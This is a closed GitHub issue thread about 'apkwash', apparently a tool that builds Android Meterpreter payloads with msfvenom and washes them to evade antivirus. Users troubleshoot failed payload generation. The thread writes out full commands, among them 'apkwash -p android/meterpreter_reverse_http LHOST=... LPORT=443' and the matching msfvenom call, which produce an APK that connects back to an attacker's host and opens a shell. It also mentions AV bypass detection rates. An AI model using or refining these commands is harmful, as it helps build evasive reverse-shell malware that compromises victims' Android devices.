Closed eddRocker closed 6 years ago
I just updated my Kali distro and it appears the script is still functional when generating (haven't tested against a device, or the AV bypass detection rates) the basic payload.
Linux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) x86_64 GNU/Linux
Have you tried generating it using the default method? apkwash -g
Also, pass in the '-d' option for debugging and review the /tmp/payload directory.
@jbreed apkwash script is working with only few payloads, can you please tell me how to make the script working for android/meterpreter_reverse_https payload.
Please try this command : apkwash -p android/meterpreter_reverse_http LHOST=192.168.1.22 LPORT=443 -g -d
You will encounter this error:```
[-] Generating MSFVenom payload [-] msfvenom -p android/meterpreter_reverse_http LHOST=192.168.1.22 LPORT=443 -o AndroidService.apk [!] MSFVenom payload generation failed.
For a reverse http payload use android/metasploit/reverse_http. I may need to remove the other three out of the help menu, but would need to verify metasploit doesn't have these three payloads anymore listed as technically they are the same as the other three.
Taking another look at the message, there is a possibility these three payloads use an older format generated by msf. If that is the case then ideally we should just avoid using those anyways.
Only following 3 payloads do not work: android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
Please Help!!!!